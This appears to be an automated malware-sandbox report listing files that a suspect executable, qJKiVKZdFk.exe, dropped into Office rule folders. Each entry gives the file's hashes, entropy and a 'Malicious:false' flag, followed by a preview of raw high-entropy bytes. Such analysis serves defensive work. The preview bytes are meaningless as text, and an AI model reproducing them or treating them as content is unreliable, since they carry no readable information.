                                                                                                                                      Preview:<?xml)....O.t.......0..k>...#L.FM.>o..=.b....5a.Q4..RxR9.C....k.D.}..2.\.}w.=.r.-=.....:....~..s..$.ZI.....`.).g.2Vw...74....Kg.Zb....%.:.\.].....t...-.d.../..\.....i.VU..z...e....!..x\;....S...........7b.,...s.....^u.^(.|..."A.f.{....k.....H4?..:^.n.......T..-.....L.I.T...p..V...........D.g...$M^.od..8.N8.7.E...r|B.ZK.Ti......S{c..".?..@+..#Y.#.e/.iE6.G..."|.e...b..l.7....c.!..t..}..Gq..~..0q$}..O_...C=..b~h3.....>. u+.29n.p.6...QJ.%S.r.Am..1.{........k...$.$(.......Su....-.j....9u.....8..........9..F.1.....g..*.+|h.X.....;..\....n.a.J[..b9E..>.c&..\...h....EI..Qi.<0.*.S.,==.].&Gy..=..r...p.+..4B....Y.._.M...E.Y.>..g../.... /P.(.....'.Pk.D......d..CY.U.*.|..O3.I......._.(.$9b.(.....\$z...b......jw..3.=I..9......r.Z....kQ.,F:.S...Y..plK..a.K|my..'.....F...@1~pm6f.....%d...g.....lp.e....Gl,.ZIS..T...6.U..g...F(Gj..4....G....W.'].........Z....T.....%M...6.y<.a.n.g~..e.y.-.=..2.F..v...B,V .24.y...=E.....@T,(...e.....^.....lsgq.O..!....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702101v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1741
                                                                                                                                      Entropy (8bit):7.898247144988365
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:XNGsfcSrGE0zk4dvZT/8R6qf8WGio6lfxXz6xIfJEq+D:9uq0HdvZPqf8/J6lpXz6xrN
                                                                                                                                      MD5:E5F693A3C6DB2BCF6712F1973CCA5CD0
                                                                                                                                      SHA1:3B712395A5732E9A3283D68C302178EBD77356F0
                                                                                                                                      SHA-256:64666F5A8546FF5EE4A9B98F83708AF4AC1174A430A56B2C8880F74CCD48C905
                                                                                                                                      SHA-512:74810D528C8767A797AD0511167AA188090A4DA9DC7D7FF10F9FD5E714F226C159DE88E4F8F3E5439537791ED40BE3C42BC30BCEE95A5638ABCC0141A0DBE9AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.L..dY.*...E..j?4.@}n...M.N'H...}K...,j..k...P..{..y.Sxf..M...n.......C..X!..qa....^.Q.h*Z..{7..r..Yl4........K8.H..S.p..u.N.\..v...Y..E...6).c.]...A...y...... K..|.t......^%.A.6.`.v..H.XH...[...3.....Z@.H1.....X..t.w.........E.$"m.4..H.j./...7x...0....1....GoW......3...t7.....f.......M0.....;..+.P.C..i.u..p.....(._.+..y..9..vr...0^.3.SJ'QTa.wT.. I.e..,0a...c.T].<P.H)ntU...!1.....JZ.#{%..x....[ ..TO...M.t.l.:.....GK......./.$....NJ."/Ne0Z...[].,r.[)p....?.sE}.....lq..$...D...y$...J..A.....,...^.zny.........S..!fN.....Y`...6jG.....A.....T.[..V.....UroY.awL.%.`.'....#..?...5.E....D}.s.x..."..Q...uk..._.......@..........I..R.X@."(x.(.....$..P....<.{.P.XR.6.P...].S_...........F..I..>p....~'..nH.....5.i...p{..t.OP...?...i..[.r(Ru.B..../P^.....L.....?....o.$..v{.q.}.M...-.S....U.s.Z.'.{<...KC.......G....#.k.4.....ZB.a.Oaj(.OO.:..Z8U....C.@..U...R1.....<.\T.+.k....3.=G-t...ef..P.V..L_.~....x.>^...]3.....5T..]4..Kv.b.?...#.*....^....m..kf..u...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702150v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1693
                                                                                                                                      Entropy (8bit):7.868248841619025
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:YGKWw/K2n8vkTuatDMLIgyneXVUYeR+KRE0sU/KED:mCOruUdEyBYH0sUCQ
                                                                                                                                      MD5:7921DA89160DCCC64A731A8773F7063B
                                                                                                                                      SHA1:3BAC6C494DA8F23ED6EE30F145363C08AD7F6AE4
                                                                                                                                      SHA-256:2B29F82539E9F38E829615211A71486EC04E9A22749C60E760B5BD1E2F99A51F
                                                                                                                                      SHA-512:F397E2D962B712B09B4590D5D0ABDA2E2D9046BAEC96D42563BF9F8A58156F2FB67813E107AA55B7C3334C0BE4AE01F10D618087BB3D7AEE21968F00CBD17BC1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..81.....'c;............r3...5.SE....qb....... c,"7'C...1w...}...|=q....N.?,w.`......G....i;f>_=.......N4......CYL..MJkk.....0*.+}.zG...]c...`Xp..u......i...f.....].y:'=...T.Fb.#..!.a ..B.M;5......f.lV2yG.#.}.#.?8..L.V.N:.i.. .1_.J[1.X.v...f..p..}\...-@..w..A4....N.E..M.,H..t.~......)zG..%.b..],.d.sU$#.........FZ.T...C..........*......F.p.~.@F.x..X:4...o..L.)g%..2.Fyo49!.0.ne....,..3...U.nO..$...q.k.\.vI6.Y.V.d.........8...F.L..9.|.-*...6......&.`..p....?.;......$...a...y^....E..q...s.9A...`.$>.DG...KM..Y.x-f.4..B.m7..$...2.|..a.}.l......V "{h..T{.I...F6.T.ZYby...A.M..05..s>...#a...........n1..~D.~.......d..$1.V.{.{.^$G.X9.S......k...M.G.(:.N.#..i...z.c.R.,.1N)..A..JI..=#..71uD..2n.$...R..E..Vp..4...L0..C..#H.W....J.{...d$....F...7..:{..../.d...T..E.z..o.kj0..(`.T...m.b........ .1....8....3cf)"...6. ......O..<..Hy..t......kA./...K.sZ.HZ.w#.^..y...9.,y*<...-.....G..Z.H...L+.\.8...6I.I^.O....5"H.L7(..c...1.qeA?..^O.,.._...9D.[........+..X.o.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702151v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1730
                                                                                                                                      Entropy (8bit):7.887089453407808
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:PTamcHCY2HR1KAVIM8whOUCt8Yk2BhrgrL9EYaCR+uo9wiCyaosP2h8tq/CvaYte:Lie9pz5Ct8Yk2X4CYalZCtKQ4U2isD
                                                                                                                                      MD5:C979BCE47AB61B22142F3D93232F5D1A
                                                                                                                                      SHA1:A6957E6BBE36BE90644A60AEAFD929396344E36F
                                                                                                                                      SHA-256:55DE3C3B1040AA2F4A5D9F76A26096B5346CD11863723AEAF74C3481650184A7
                                                                                                                                      SHA-512:BF6A4F0E2C1C416FD993A4EFEC78F76272B1096C5885238296A7648D9502DB911804E872B763048676C342480276A1FA231E207D60FBD3B04DF0E67114566D8D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...I...g&.3.b9..Qn.R..^......?. .R..B.bC.P%\ ...7...ON.!.)hAC..c9..8.j..+Q.p....cM......}.(6...bx.7g*3...PW.r..`..........U<.^t^.gO.[...U,9\......5oN...wI......?..Jw.........HN....Lnt..*..D..B...o.gR.>....7m...S].1"&.[.6..j-u...B1D..@..<xBcT.-..v^.{S}..l.U..^..a.\ta.l^.JE.^5.;.o.dcyg.-...W".s.I..#..e.}...<........X:+...K.......+t..../.!G.p.....@...4x..=|....*EY.t.'p.,z..`.OT.P...R...=....9..\..:Q...;~J.6.`nH..b*.0.m.^u.....lx..j..04x....f..y...!.mw...C......=....+*.*OmU.E...oeS..(X......,..^}..[I.U"....Bw.........K..&.C..l...h$'>k[.gu1}....v|j....YX.cyQ3x}......a.../X..K.xE.c....].K-.[.O.fT...7..X.y*.pG..`..m.T;._(.9e!u.6......w.4.Z.{<!......=.7...[u..p.B...a......,......k.......I...-.8m.;FD. 1.XKvK..DyUfa.?.]q.\.I...e7.q..7.).>.@r..Z)...Yp.......'..1.jKf.....C..3-.2-..q.I...a.9j.-..&.e.|...R.v..f........:..|.'H.T..u.../Us3..!...Wf!...wB;...B.s..A.a.w.B.({..= l..:..oZ.RlL.z@..Ehzn..w...+.$.^...+C;.....a....1.{...GU...z....*..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702200v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1693
                                                                                                                                      Entropy (8bit):7.865125367530794
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:I4E5k9szQQjyGJuUmbb5T2Z2SizMCpZ+6TIHD:I9k9sMc05eIg+rTIj
                                                                                                                                      MD5:01DD2E8A2EA273BF5557AC54F3A62456
                                                                                                                                      SHA1:C20737D76E573B919BEC84F303A5FBDF044F590A
                                                                                                                                      SHA-256:E06EB5804CEBE6EF98224C95DC4C404756866C956AEB2C61D43AD299403A8E0A
                                                                                                                                      SHA-512:448069AF6CC0442AEA4C41DDE4FBF061A667000AFCF8E231E855F38904817847D3670B75E2DDAFDF32BED6BB506CE11E94A27DD1D545A792B65CD6BA07E50E2C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...[..0~.BDc..N..&W\..(bR....0...i....+..P.2...p.....pKk.8........Y.l..d....\..L}..Mx(G./.Pu.y.v.....T.}.....I.Nj.)..>.j.F.2\....B...4..ce[v...M.N.7....U....>K.YU.G..~.D.;.\fv.....~\.>.k.o..7P..2....wHM._J"Y.\.......M...`8..O..........n..A.........@..s..*..34....@.bw.i^0.Z...N ..M<.o7..(.,(#..).O.5...P.7..K......I...T7.d.c..#......a.1..a..aHW.0Q)...0T..3...f.q..!p....)%@L.......Q..oQ._. ....dj:..._o...L.Z.&..r...[...$).)..A..*.-.e..y.'.vBe.O.y....o..9..3..+q...C.3......#....$h..../.7G`c...t...k.W....Wh....f.._.a..b.$.X..vZ.,....6..`.8Vs.cPv..WM.....5BEc...I.i~..o`..?..CE<PHx8.........C.........Z-..f....+.V..]...!B.z....I.?......O......f.p....^.b<.~.K.QB...xMT.."jr....$. .q.u.z6Pb.M..V....7.....9.t......$...`\6$.......-..u.r..tu4<..P*...G.FG.wo.........}...R... W.d%..3#H.%.?..T...B.r ..:.E..#<.VA.i.......2.&.....t...G.......-...NY0..A.-p...D.i...........\A.g.$}>...Rg..6~P._.1.&.#..;.........q..)...I6..n..PJb...VG..Q....!...Ku...!D..[..VG

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702201v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1730
                                                                                                                                      Entropy (8bit):7.863640897537396
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:eYVxo1MwBlSCtQnahjb/MzL0uML74n7yRPH76Gu0hI5Iv+vw2FJD:Hs1/BICtRt0fDML7MmPH7Y5Isw2Fh
                                                                                                                                      MD5:2DFDC567DB85B0E79665859BDAF2FDCE
                                                                                                                                      SHA1:17A84F5AFCEB26A21AFD40ABB9B2628681E4C183
                                                                                                                                      SHA-256:6FA0F030218AD2C0A8BD8C4FA5625A5B5A4B872D56036507ABD81A9FDFFA103D
                                                                                                                                      SHA-512:10C685231983C656A49CA0894082D6D723CBE9B4290B47762F6712954E54264B02DD6C65F8D817548E4868CF307C9BB6F0B234F71EA14BE25E2C8E5A0FC4AAA9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmli.....B.z....H"......B0.W#..7....lys.{.>....d..7j.....j7...R}..hu...f2!7.....~c....LS.iz.R..S2....l.%....y..n.....,...........0\L..../....o...iP.w.+.{...|..\G<.7.Cn.D.).5..7.....S.SmZ.a2.n..[h...X...._...J.2.z....B..y.`.x.i..ZM;P...v...M.=!.&w.y..g. R..(.IL4.>.M3GP.$.{s.../..L...~.O.1.a.7D.J.F...)...r....M4.1..*.r.L.....?C...J&...-2 G7.w"za2..i.D..U..4...;...g...c8...b7.01@G.h.......|]V].n.{.i5r.......n.'.k.].....b{_.Ln"/.=...M,.f..RG'..`..<+3h.uQ..)......5...85.;;>.7....[.\.@.y9.....5.Q.....i....q......k..y_.{...@...Gz.!..*.f...1....uD.._]<...~."~...k....wi.Pt.....F...=..'&./..y.C....1.<$.@n 6%f....*....L...H..T.........Q,..EDi.q..8..n.$.@.b...e{..-}..EyJ{0.;T.Q3(~..[...w$p,;j...|.......M\fk.6i...V%U...A......B3m..]....\+....P..7...W..^.%...A........e...3..}.!.v.-]x...9.l.P..........^..m.......ou.9.......6.k.2.L..H.mHLd..>R.~y....s....`....Q..)..=..ZF..y....l....R..u.....X...L`.....{..P.2.7s.>.(.t..... .X.fB....I.].#.l......8

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702250v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1685
                                                                                                                                      Entropy (8bit):7.885322057821452
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rynorW2rdmWM+Ap8whDEQo3c7GG9r+MmkD9l7D:rynordrdzAp8w5o34GYrCkDb
                                                                                                                                      MD5:587840DAF1607A4F29332F3836108C58
                                                                                                                                      SHA1:A34D6B68A42A19587DB9B761984A4D243D5FF693
                                                                                                                                      SHA-256:0ED4258B57D515FA82A4636C18FB33154F9B05C34382DD91ED5B48B14656A026
                                                                                                                                      SHA-512:1933ECD5EDDA0C1EF0F149E00E0AF5A625A23F0742E7F6308AFECFEBD2E7D1DE7EDE63E35863C5C6DEEE35FB67CD00A6FEC75192AB3E1824C953F60A18E7491B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...+.O./...A.$.%i.D.. NB.N...".....=.......;)t..5~s|.;/?.o....r|....`.1N....].?O.@._...F.en..K....<...A.+,..Xn..m...[...p.4:.eIh.@.g..?.v/.Z..:.....`.......mA.......K..*..U4n..9.K...n...=7u....[.#....e.....w-.....Z...XE...}...Ph.P]Z..gM'..?X....a.5.4..o.....B..Bl......p...IX,ZM..M~k..;R.%...,..=..k.A.n2\..N.... "8$7.....re..N.4s.`...g.].;.L..r..,...PW...G.Py....-).t"...v8.97..X../JG.O&`.k....N..o...}..B....L.+A..K'../...3.....x*....ZA'yw.45.....E/'.M..Y.m?.[.w~.....*|H^.\d.L.kB....E.....C....".'C.....n.M3X..z.%-...S...j....Sva9.Y%.p.....6..|.....&....#.;..,.5..P.$8gx..W...`..1.....AbM.p...j...7...Um.@..7?.....-.Q..5;....KHBq.'...Y.'.F.mK...%....(J.....Wg.3.bKG.u.v...y..W..yT!...5.(_*..D}....f...:<..r.(..o...K."i..,0..Z:....^.Fq.1........y.)."...ts..Ai.f.Q.x.k....].....E.L..-m....4Cttg.x...X....P.mq....z.j.8.~.VA.R.M.._...a?.5.b..."... &.R.6|."Vb.M.IQ..............0G/JL.#Zs.I]X.q....c....X............t..!..'X...&..b....c...gV.>... Z.O"%l9n.T..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702251v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1722
                                                                                                                                      Entropy (8bit):7.883591047250646
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:mFFBy2x8ya4UQ5yWMQLBtMYonE77vOZ4lcOG0ncSbJFyD:mTBiy8Q5LTt6E77UWZncSbPa
                                                                                                                                      MD5:2873C2DF1540F8F79A7BBD0615AB255A
                                                                                                                                      SHA1:ACEC112829F84FF5CABE525472B0E54A31F15F46
                                                                                                                                      SHA-256:C62D313070714F140B51B6011A2F23CA98981B3DE3C339566CDFF05F2326DD9F
                                                                                                                                      SHA-512:7CBFCCD1CD3F311BBEB1C9A122C3EEB0B7577BAA111C822A2F4DABBBB5407DBBA6B468632B4BA49650310D819CC5FD57AF9E576D618F64AF8492CF247ABB0C2E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlU...V....!.z..,.....?.k...on.....5wcy..b.'.(.Lo.c.. ..........I.e._.........2n.....x...Ly.x_-&..%...&..U.....O.H(#........._...;:.i.....W.....E.8._.e....J.....e..n.sF.d...3..wn.W2dY.Qq.a;...}$.8I....a..+Gn.......G......Bv..-...*,....h.N....&0.."..'mQ.n..9.E=..s..Zl...tc..!Q......._.$..u..s3.._:c.p0U9.{.....3{w>R...q.gf.].|..q.d...M..<Gu.43.0$../.K....7j=.d..1.H...X......PE.Vr....K...A..x....).>:..0&-..D..6.VJm.Rd...R.)...@mB...]p........9.L/.....|..Z7ih.........YCSw:.MD.W.R.q.[^..$..Z.M`..wt|.n.N.....&..9.5...bZ......:....>..|9..:.p.$.R).[.a.M).m...3.j.zG..u.w... .e..68%."..YP...W..P.....n.<..B....|....*K...#.&.wi!!...e.n.%.cWJ.i....u+.k...9k.$.0&:um...vo..[..e.._.5W..UYE...8?F.....=...U....P.........jQ...\.x.<%0%..m..-..J#.s.w*y..$G..S...D.;...\n.S.i}.,..S..`..X....U........,.%..%J/t..YT:.J.Z.i.l;.kr..4W,........^.9..]..63.n...T2.....1x.n...q..c[.h.y.E.H........U[oU.?%...M......2`k..S8.[..DV.....=B(.`...nbU.2...[..c.........8..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702300v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1695
                                                                                                                                      Entropy (8bit):7.867103040918359
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:LIHagzboHmVxSq/gDuI9F1PjmblLzF8q0kDRD:LIHZMIEuM5xqbl/F8qvDZ
                                                                                                                                      MD5:8F5A204F1A7195D2A27308C29126E756
                                                                                                                                      SHA1:1366892DC7C7E82823F1F6EA22E2A313358AA6C4
                                                                                                                                      SHA-256:8071D8ECC88BCB59D29A1BC44B4416DD2F747B179B9D857B111C46EC272B9A34
                                                                                                                                      SHA-512:5E0166AC0AF7537ADD9ED6F6BCA37FAD4C7869E9A6F1E23EA152FC105A51863F9FF1CF692755F2B78260A5DA261E76B97EEECDFC6C9B38F831B012AC80262B4C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....mQ.^]......(.` .........Z....X.+.b....<.........:I....4.@W.AfV....^.......`...[.H'.e.V....w;.z.Z*.+e..P...'.....f..4.i.g.._.u.`.E.mR.J&.....-.y-C.....@.#|.?.B...2.s].......odh.1....Y.....&.My..%t...I...c..yB.\7....]<.......H...7D.:..@Q......D5....E"|......9v..l^5-....-.;.y..1I[.8.6.....p..C..?h........bN.YI.v.G...,./[....#...b...?.,.^b.:.._......@*....z.....&.f<'wE.<..=...=.'H...p.d..q.'?.UR.-....K..{.N..i."j9...>..v..#...<..,.w.btn#.T.....B..>]?y.l..........+..4..b....5..!..K...#.P....7y|.9.J..E.n$W?+..hK..Xn..4..L....,./...f.~.&.-..]..'...Q\2..y..A..{......4.."..g..Qt.....E...w.GdQ.....~..D.8....GND..+.i..8.q..[....%3..$'.~......p..e..._;^-8<..n.dr..P.'.^.}.p.0...t.........mL].p G:..I.g7......@.V..6.......z`n..+^.t..5.`z...hH.".-$.~G#....o.p?b.9 .C.....f.3.....|.!Ov...K>,.f.....p Gvo...'.~.6.[.Y...;f= i..-....}.[..m..A..zy...z.Sw.m.}..k...d.=x.h.....2]R.l...-S.<.[..O...zc..........g...O..i......Eh.p.G_o...X.=......^.V....w. o...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702301v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1732
                                                                                                                                      Entropy (8bit):7.897939909930939
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:vtjK3/hKgKi1os5+ueWg7bSr80cNM8Lfg/ht3HD:lncos5jeNW83hg/ht3j
                                                                                                                                      MD5:38CCB24033F5E4432BCCC5531D148DBF
                                                                                                                                      SHA1:B6AAD8069E0AF1D52C8C349AA70DAC1F0A7D8FB0
                                                                                                                                      SHA-256:2B69B044AF44806DE78A7835401E8B1B93A6478ABDE76BC786EAE1CD89BC5F48
                                                                                                                                      SHA-512:69429396B2FA72B33CB04E156574A5FFF6180EA0C45160AE685506D4FA2E9D413F477D2DCF25A25E50813CC43FF46ACA7981EF0C481A7481B1123C770F25DAC7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..N...V\...m..a....3fG.Q.'..ZZ..X8._..c..U....2....h5..:.s..%R.e.......(..._.x%m~.o.?.O..B.. .d.U....-.V.b..?....[?V./2...P..p`....j..U$......^..;yX4,+......4..K.X.g.x..z....p.4.k.L#4..!4......1.0e..w.k.q/,..Qh..S.e..G....w}......2...P..+.>.?v.,3e4R.q....T....r.b.r.L...X...........nZUY.x.m.a......:3z*..........Q.Q._..*.,....u...Q...........%..5.H...a0.M.+.-t..]..Cjh./..n.W....%#..i.,.V.Zb.].X.....o.'.on.=j.y...a^x..=.Ys`..c.J.a.Q%l.9..;.C..*...@.+..W.p...W1.Q....F.a......q.........II.#.U...*T.......I....Z.....q.w..Y.3.#...........mI[<.|.Y.-......O..Z.....k..+Rgl{c."..........0......0.5..-...\.......B...U.4.r...l.9....J2E@k.......u.:..R....M..4?P.....$...F.;..J....L\.7.@tDu o.d\...9....2M..N".....?..##....k.^.'.[^R..X ...._..e..).......~.yp"4d8..8....|.z1'.`.b....G).)]Ns........._..E.;M..)....0x.....c.......T..K(S..p.1%..e....].kCr.y....A.[.E..1.....z#R.Ow.....-.....fz...Mt..@.=..n.ST.5.$N.U..9.B.;...h&.L......8.r.....6V.D.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702350v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1691
                                                                                                                                      Entropy (8bit):7.879714394411361
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:JcRGU1FyGlQ7yNasJuWSnsRTwAwKR2AlineJhtmmm+JH0o/NOuZ2sMM8VZHLGUBA:tU1IP7yN9gsR6OhtmmXJUod8rUD
                                                                                                                                      MD5:A9EF6AD94018298F5CD9A8A02D956A30
                                                                                                                                      SHA1:E91A75687982BFCDE5DEFC8EEC7B9B1FE39DEF67
                                                                                                                                      SHA-256:E4A8C68B484BFAD518B18387149270A016B3AEC34AE15E5D0693813D7A503062
                                                                                                                                      SHA-512:5C6748EF41F5EE6157471C231951E12E28120AF778DFE9F8868D394CECE369D49289C7B72E72552AC9F5BA8F6AB3637CCC633DF003CAA15D0885D11D989F525D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..J.1(7'~.mr/....|%o.Q..}...@..tO...c...7..@.8.......hy.B.%P=.E......2r.....v.E.I.n...t.%z.Hj.8:...3E.k.z.......n?.K.5.....)..3....LW..Z...........k.C.7}.Qf.m8b... ......PJ..ST....(y...suIw...y..?...Q`.;.(."..Y....}.c.).Zny.*......<..%Mc...Qz.........+....<..Lz.........,.#8a.;<..(w.u..F.l.|.3.4...Y\..V..Hr...x..!.O...../.._.a..(.8..C.~G...W....<.....Aa.d@.L.B..0C..o.hB....2..0..Z0......n.Y..5.kc .h(.?|Y.vD[HmG..!....~..e..'J*...\R...$........ ..../. L...U.3.v.qYS..=3.K.@VV.hP..i...T."..7"-.......W.dqE..[TY~.../%...\3..B..+.!g..^.lkk.Rs.H.U.......0..;R...I.].K..]"...j....ey...gU.....]M.....t...-.........J5.$b...C`&...D..z...z...Ei....".q%.C>..(....t~wu..6..+.e.Pw...D.."...v~.x`j.g..Iwx..w6.......&._I...XK..;.....X...&...)....8...-T..$C..dOT| .H6o.;~\...y..,....R+..q/.".C..qF9.q....|....\.%..x..u#....%$..d..........8T.7....=.r@....A. O..9..bj...7.99.QD.X.tO...K.^.|.. .{l.......NSm...=...L.c...uFv...TW..(u..........`..;.oJ.}..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702351v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1728
                                                                                                                                      Entropy (8bit):7.878378317670039
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:QnC61Qu6GpTukxdCunKXRsxvRrpcNR3KTRkZfD:F61Qu6GRMuKqv7TRkZL
                                                                                                                                      MD5:4C79DEEAC935477DFD2AB8989E9E9349
                                                                                                                                      SHA1:440338381C53047FC93FC6702D6EEF9C4033ED2E
                                                                                                                                      SHA-256:BCA43F6D1C478DFDC1CE7F8B6E163C5E3E83BA83570CDF6BFF5F1B811EAD9828
                                                                                                                                      SHA-512:90F89A0DE0FF6AE9394EA99F4A65F318A8957ED1FA289E78E74E9548A297051ED5EF2C7056D85A8FAC623852CD67B26463209189F5D8C790C692026609A878F1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml._>.......6(......xt_.\...OC.1M........?.......r.:Z.l.N\..J.!.d.T6.B._R..h.).".+.-c.>..g.drHlH._..@\.`..%.O..F.X....U.......@-...$.Y.....s.n..K`.{k4.w..-.g.A.k.q..>o.s...#w:..r..@.>..=.H....lx..-...i.....f....nx...1BL..>...60...B).......'.....F".......g.. ...Dr..8/ ..........K...ydr.2.g?....a3z..glt..). ........4.}.c...)Q.......d........).*c.a...'!v.J...E.9a..w!N......N..e....X:...7.&.a$@...afT..........pCG......3v..9.C^..D.4..V.....RY.8_....eC.7.3....Wo.ou......[. ....;(....Y.......&T..P....]../z.......t....].....y....8.y.&q......zV..PY. J.Y.).c<v.j...5m.L03r....]).X.j.py.De=bt,....{<.......Vhost.L(.l|/......n...VV......)^..{fVM#..jy.....#.$...n.M..QP.3V.u.._j..*%.....n,.....C.5.&v.BG.q...6......t.}kw.......#..........L..g......j.Yy..Iv.._...b.5.....6...Pk....0.a:..=i....P.@..I.....>...H....y<...o....\..L.j..A..^.'./.9D...h2....O..b.D.....G....{I.=.6PUs.``.....>>.......033.j[.8....\....R...@.....Fmy.I=..Az}......8}I.FR.....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702400v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1701
                                                                                                                                      Entropy (8bit):7.861305820018599
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:by13DpLKDIiiT1MXp9oWtAG9dTQVqwnwkTOJMFDvjGAfyvXJ31oZ4locfP+3HlbD:ALWphtAGXTQYwn5ToMtjGjJ3/loam3VD
                                                                                                                                      MD5:5E0E4F436EB090ADFD64F5E70060E350
                                                                                                                                      SHA1:EC93E94C5BC7B52A0CB5E9ED8EBEBC20FD637A9A
                                                                                                                                      SHA-256:7A1A5398C49E5BED890DB8F61617F058B910A82D4E4F3D8D0F8F28DF259B06DB
                                                                                                                                      SHA-512:CA3EDBF8E36D26B5332C2531EBFDEBE3A72B4CF9E5BAACBB08199998BA4E4E3F9347946CCA538FCB55C5AE961647EF81F96ADEA86731F2DB0BAC79FF965DD24F
                                                                                                                                      Malicious:false
